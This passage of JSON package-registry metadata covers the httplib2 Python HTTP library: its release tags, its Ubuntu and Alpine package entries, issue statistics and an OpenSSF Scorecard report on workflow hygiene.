osyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T18:34:40.881Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/python-httplib2/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1440,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":1322},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-08-25T05:04:58.025Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":6210866,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2020-05-21T07:26:19.000Z","latest_release_published_at":"2020-05-21T07:26:19.000Z","latest_release_number":"0.18.1-r0","last_synced_at":"2026-07-28T19:01:39.076Z","created_at":"2023-02-01T02:55:42.533Z","updated_at":"2026-08-23T21:20:16.420Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.13/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using 